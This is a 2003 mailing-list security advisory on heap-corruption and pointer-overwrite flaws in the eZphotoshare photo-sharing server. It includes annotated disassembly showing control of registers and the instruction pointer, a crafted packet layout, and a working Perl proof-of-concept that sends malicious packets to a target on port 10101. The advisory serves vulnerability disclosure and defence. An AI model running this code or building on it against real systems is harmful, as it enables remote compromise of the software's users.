[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY8-F65AY8tTIT0HQT0000700d@hotmail.com>
Date: Wed, 03 Dec 2003 15:41:57 +0000
From: "Peter Winter-Smith" <peter4020@...mail.com>
To: bugs@...uritytracker.com, bugtraq@...urityfocus.com, vuln@...unia.com, vulndb@...urityfocus.com, vulnwatch@...nwatch.org
Cc: vuln@...urity.nnov.ru
Subject: eZphotoshare Multiple Overflow Vulnerabilities
eZphotoshare Multiple Overflow Vulnerabilities
##############################################
Credit:
Author : Peter Winter-Smith
Software:
Package : eZphotoshare
Versions : All up to and including the latest verson
Vendor : eZnetwork
Vendor Url : http://www.ezphotoshare.com/
Vulnerability:
Bug Type : Multiple *Interesting* Overflows
Severity : Moderately/Highly Critical
+ Code Execution with Application Privileges
+ Arbitrary Memory can be Overwritten
1. Description of Software
"eZphotoshare is an amazing new way to share Digital Photos over the
Internet
with friends and family. Seeing is believing, download it today and
interactively share digital photos anytime, anywhere. It's FREE for home
use."
- Vendor's Description
2. Bug Information
(a). Heap Corruption Vulnerability
By sending a packet of data of length 80 bytes to eZphotoshare on port 10101
exactly eight times in a row, it is possible to overwrite the ecx and eax
registers in memory when they are loaded from the esi pointer.
The vulnerable code, which lies in the RtlAllocateHeap function in the
module
'ntdll.dll', is shown below:
:77F580C9 mov eax, dword ptr [esi+08] ; eax contains our
arbitrary
; dword of data
:77F580CC mov dword ptr [ebp+FFFFFF64], eax
:77F580D2 mov ecx, dword ptr [esi+0C] ; ecx contains the next
; arbitrary dword of data
which
; we supply
:77F580D5 mov dword ptr [ebp+FFFFFF60], ecx
:77F580DB mov dword ptr [ecx], eax ; write the contents of the
eax
; register to the address
; referenced by the ecx
; register!
The packet structure should be as follows:
$packet = "GET /aaa" . $eax . $ecx . "a"x64;
Where $eax and $ecx are four bytes exactly in length.
This type of flaw could, amongst other things, allow a remote attacker to
overwrite a saved return address on the target system and thus open the
possibility of remote code execution with the privileges of the user running
the
application.
(b). Overwriting of Important Saved Values
By sending an overly long packet of data to eZphotoshare on port 10101 it is
possible to overwrite some important saved values in the system memory which
can
be crafted to lead to complete control over the instruction pointer.
The vulnerable code lies in 'mfc42.dll' and is shown below:
:73DD1C3D mov edi, dword ptr [ebp+08] ; [ebp+08] points to a
pointer
; to our user supplied data
...
:73DD1C62 push [ebp+18]
:73DD1C65 mov eax, dword ptr [edi] ; the value pointed at by the
edi
; register comes directly from our user supplied data, therefore the eax
; register now contains anything we wish it to (even nulls!)
...
:73DD1C6D FF90A0000000 call dword ptr [eax+000000A0] ; whammo!
the
; execution flow is directed to the address contained at, eax plus a0h.
To
; gain control of the instruction pointer we just need to point to an
; address containing the instruction pointer which we would like to use
; (remembering to subtract a0h from the pointer address), and we have
full
; control of the eip register!
Exploitation Notes:
I have been able to execute code through the flaws found in eZphotoshare,
despite the apparent complications which arise when it comes to
exploitation,
and therefore I would urge you to take measures to protect your systems if
you
use this software, whatever those measures may be.
3. Proof of Concept Code
I have decided not to release my remote code execution exploits for the
mentioned flaws until the vendor has had a fair amount of time to patch
their
software. Instead I am going to release a proof of concept code which will
demonstrate the heap corruption vulnerability.
I am not going to release code for the Important Value Overwrite
vulnerability,
since it is pretty straightforward to reproduce and is best just
demonstrated
with netcat or the like.
For best results, attach the windbg utility to eZphotoshare before using
this
proof of concept code, so that you can see the attack and its results in
realtime.
#
---------------------------------[eZpsheap.pl]--------------------------------
#
#!/usr/bin/perl -w
#
# Heap Corruption Vulnerability in eZphotoshare PoC
# - by Peter Winter-Smith [peter4020@...mail.com]
use IO::Socket;
if(!($ARGV[0]))
{
print "Usage: eZpsheap.pl <victim>\n\n";
exit;
}
print "Heap Corruption PoC\n";
for($n=1;$n<9;$n++){
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"10101")
or die "Unable to connect to $ARGV[0] on port
10101";
$eax = "ABCD";
$ecx = "XXXX";
$packet = "GET /aaa" . $eax . $ecx . "a"x64;
print $victim $packet;
print " + Sending packet number $n of 8 ...\n";
sleep(1);
close($victim); }
print "Done.\n";
exit;
#
------------------------------------------------------------------------------
4. Patches - Workarounds
No known patches have been issued. Secunia often have pretty sufficient
workarounds, so I would recommend that you check their 'solutions' on
www.secunia.com if you want a professional opinion.
5. Credits
The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard
any of the analysis to be 'set in stone', and that if investigating this
flaw
you back trace the steps detailed earlier for yourself.
Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm
crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick
k.,
Joel J. and Martine.
Huge thanks to everyone who makes this industry as great as it is, and puts
up
with all my ever so vague and technically questionable contributions ;o)
Brett Moore - Are you *trying* to break Microsoft? ;o) ;o(
o This document should be mirrored at:
- http://www.elitehaven.net/ezphotoshare.txt
_________________________________________________________________
Hotmail messages direct to your mobile phone http://www.msn.co.uk/msnmobile
Powered by blists - more mailing lists